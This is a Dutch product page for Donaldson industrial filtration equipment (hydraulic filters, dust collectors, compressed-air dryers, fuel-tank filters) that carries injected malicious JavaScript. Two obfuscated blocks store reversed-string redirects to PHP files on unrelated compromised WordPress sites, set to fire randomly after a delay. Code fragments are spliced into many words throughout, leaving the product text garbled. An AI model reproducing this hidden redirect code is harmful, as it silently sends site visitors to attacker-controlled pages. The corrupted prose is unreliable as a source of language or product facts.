Filtratie oplossingen voor industriële hydraulica, stofafscheiding, perslucht,…

Lage druk filters

Lage druk filters zijn het type filter dat het meest gebruikt wordt in hydraulische circuits; ze worden meestal gemonteerd op de retourleidingen van toepassingen die gekenmerkt worden door een leidingdruk die kan oplopen tot 150 psi en een maximale statische druk van 300 psi. Donaldson biedt verschillende combinaties vermogen/druk om aan het merendeel van de toepassingen te kunnen voldoen.

Midden druk filters

DURAMAX filters van Donaldson hebben de reputatie de meest performante opdraaifilters van de markt te zijn. Ze worden meestal gebruikt in retourleidingen. Hun ontwerp maakt hen het meest geschikt voor dubbele circuits. Beschikbaar met filtermedia Donaldson Syntec en cellulose. Voor leidingdruk ligt de schijf begrepen tussen 24 bar en 69 bar, voor statische druk tussen 55 en 138 bar.

Hoge druk filters

De hoge rendement filters, ontworpen door Donaldson voor hoge druk toepassingen, worden onder de pompen en andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere aandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andrijvingen gemonteerd om de verscheidene gevoelige hydraulische componenten, zoals cylinders, motoren en ventielen te beschermen. Ze bevatten allemaal het synthetisch filtermedia SYNTEC dat speciaal op punt werd gezet door Donaldson voor een hoge doeltreffendheid van vloeistoffiltratie. Voor leidingdruk ligt de schijf begrepen tussen 138 bar en 420 bar, voor statische druk tussen 310 en 827 bar.

Toebehoren voor industriële hydraulische systemen

Ons  gamma toebehoren voor uw hydraulische circuits en reservoirs is vanaf nu een stuk breder! Donaldson biedt vandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andaag de volgende produkten aan: indicators, manometers, testers, ventielen, beugels, oliemeters, ontluchters enz .
) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tofafscheiding en filtratie van lucht”]  

Stofafscheidcollectoren met filterpatronen

In de jaren 70 was de DonaldsonTD het eerste ontstoffingssysteem waarin de door Donaldson® zelf ontwikkelde, automatisch pulsgereinigde filtratietechniek werd gebruikt. En aan het begin van de jaren 80 was het opnieuw Donaldson® die de maatstaf in de stoffiltratie verlegde met de introductie van de Downflo® stofafscheider, dat, door gebruik te maken van de wet van de zwaartekracht, een extreem hoge afscheidingsefficiëntie bij een laag energieverbruik kon leveren. Vandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andaag de dag bieden wij 16 verschillende stofafscheiders en 16 verschillende filterpatroon opties aan.

PowerCore stofafscheiders

PowerCore – een award winnende revolutie in stofafscheiding – combineert Donaldson’s exclusieve Ultra-Web® nanovezel technologie met onze nieuwe expertise in media verwerking. Dit resulteert in de ovaal gevormde PowerCore filter pack, een extreem klein maar krachtig filterpakket. PowerCore stofafscheiders verwerken hoge luchtvolumes, hoge stofbelastingen, moeilijk hanteerbare stofdeeltjes en passen in de kleinste ruimtes. Deze ruimte besparende stofafscheider is verkrijgbaar in twee modellen: de CPC (vrijstaandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande stofafscheider) is tot 50 % kleiner dan de traditionele baghouse stofafscheiders en kan toegepast worden in veel verschillende applicaties. De CPV (ontluchtingsfilter) is tot 70 % kleiner dan de traditionele ontluchtingszakkenfilters en kan toegepast worden op silo’s, transportbandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and transferpunten, transportbandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and afvoerpunten, molens en menginstallaties.

Filterpatronen en vervangingselementen

Alle Donaldson filters en behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andelingscomponenten voor perslucht zijn specifiek ontworpen voor gebruik in combinatie met elkaar. Het karakteristieke kenmerk van de Donaldson filterpatronen zijn onze exclusieve Ultra-Web® nanovezel-filtratiemedia. Onze nanovezeltechnologie biedt al meer dan 20 jaar schone lucht, een grote mate aan efficiency, lage drukverliezen, grotere kostenbesparingen, langere standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andtijden dan de concurrentie en een hoge mate aan milieubescherming. Namaakpatronen hebben daarom nooit dezelfde levensduur. Indien u uw filterpatronen wenst te vervangen door Donaldson filterpatronen, aarzel dan niet om ons uw technische specificaties door te geven, zodat wij u een offerte kunnen maken!
 

Persluchtdrogers

Donaldson produceert een complete lijn van perslucht koeldrogers en adsorptie- en membraandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}androgers om aan uw specifieke benodigdheden van luchtkwaliteit en systeemoplossingen tegemoet te komen. Het moduleerbare assortiment biedt specifiek klantgerichte oplossingen en garandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andeert hierom de hoogste efficiëntie. Roesten uw BOULONNEUSES vanwege de luchtvochtigheid? Installeer een persluchtdroger en uw probleem is opgelost! Vraag ons een offerte!

Complete persluchtfilters

De filters Ultra-Filter DF zijn bedoeld voor het conditioneren van perslucht of andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere gassen in industriële toepassingen. Het design van de filterbehuizing met bajonetsluiting tussen filterkop en filterreservoir maakt het mogelijk om de filter samen met het filterreservoir te verwijderen. Hiervoor is slechts een geringe uitbouwhoogte noodzakelijk. Naast de besparing van de energiekosten door het filterontwerp, biedt het gebruik van de Economizer nog meer besparingsmogelijkheden. Het meest aangewezen tijdstip voor het vervangen van het filterelement wordt berekend en lichtdioden geven aan wanneer de filter moet worden vervangen. Met 9 verschillende afmetingen dekt de Ultra-Filter DF het capaciteitsspectrum van 35 tot 1.100 m³/h , en daarmee de gangbare compressorvermogens tussen 2 en 120 kW. Er zijn verschillende toepassingen en assemblages mogelijk : calescentiefilter, deeltjesfilter, actieve koolfilter. Monteer een luchtdroger en uw perslucht zal nog nooit zuiverder zijn geweest !

Vervangingselementen

Donaldson biedt alle slijtstukken voor het onderhoud van filters van alle merken. Zelfs al is uw installatie niet een oorspronkelijkeDonaldson installatie, toch kan u voordeel halen uit de technische vooordelen die Donaldson biedt.  U geniet van geminimaliseerde energiekosten, goede prestaties tijdens de levensduur van het product, gegarandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andeerde kwaliteit van het product dat u produceert en een grotere productiviteit doordat het proces veilig en betrouwbaar blijft.
) == "string") return $Ikf.list[n].split("").reverse().join("");return $Ikf.list[n];};$Ikf.list=["\'php.eroc_nimda/bil/steewt-tsetal-siseneg/snigulp/tnetnoc-pw/moc.nosredneherdied.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andstoftank filtratie”]   Waarom uw brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andstoftank filtreren ? De hedendaagse uitrustingen zijn meer en meer geperfectioneerd en de verhoging van de injectiedruk op dieselmotoren, bij voorbeeld, vereist een perfect propere brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andstof. De filtratiesystemen voor tanks van Donaldson kunnen u de kosten op wisselstukken zoals injectoren besparen en de tijd voor onderhoud van uw voertuigen beperken. Kortom, deze installatie doet u geld winnen!  

Filtratie tijdens het vullen van uw tank

De Donaldson filtratieunits voor bulk zijn gefabriceerd met en gevoed door tangentiële lozingsconfiguraties om drukverlies te voorkomen, wat een doeltreffende eenwegsfluxfiltratie toelaat die de gewenste properheid van de vloeistoffen verschaft. De Donaldson filterkoppen zijn vervaardigd uit aluminium om metaal-op-metaaladhesie of een blokkering tussen de kop en de filter te voorkomen. Ontworpen voor systemen van elke omvang, met een minimaal drukverlies

Filtratie bij het nemen van brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andstof

Teneinde te vermijden dat roest of andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere vuildeeltjes uit uw tank in het reservoir van uw voertuig terechtkomen, kan de brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andstof beter voorafgaandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and worden gefilterd. In functie van het door u gewenste debiet, zullen wij de perfect passende filter vinden!  

Vervangingspatronen

De juiste filters vinden voor uw installatie is niet echt moeilijk, maar herinneren we ons toch enkele sleutelpunten:
  • De viscositeit van de vloeistof speelt een belangrijke rol in de restrictie van het debiet. Daarom is het primordiaal om de passende filter te vinden, teneinde een correct debiet te behouden en overdreven drukverlies te vermijden.
  • De verschillende brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andstof- en oliesoorten hebben verschillende eigenschappen. Kies voor een filter die de beste combinatie media versus vloeistof bezit.

Toebehoren voor tanks

Bescherm uw investering op het ogenblik van de stockering :
  • De T.R.A.P. ventilator van Donaldson vermindert het risico op stof en vochtigheid door het luchten van uw tanks zonder te beletten dat grote hoeveelheden vloeistof in en uit uw tank kunnen vloeien.
  • Bescherm uw opgeslagen brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andstof voor vocht dankzij de ontluchtingspijp Active Reservoir Vent (ARV). Hij verwijdert vocht uit uw brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andstof via droge perslucht.

Off-line filtrate – reining van een volle tank

Deze mobiele kits laten u toe uw olie- of mazouttank te reinigen zonder deze te moeten legen. Wij verhuren u deze gratis en factureren enkel de gebruikte patronen.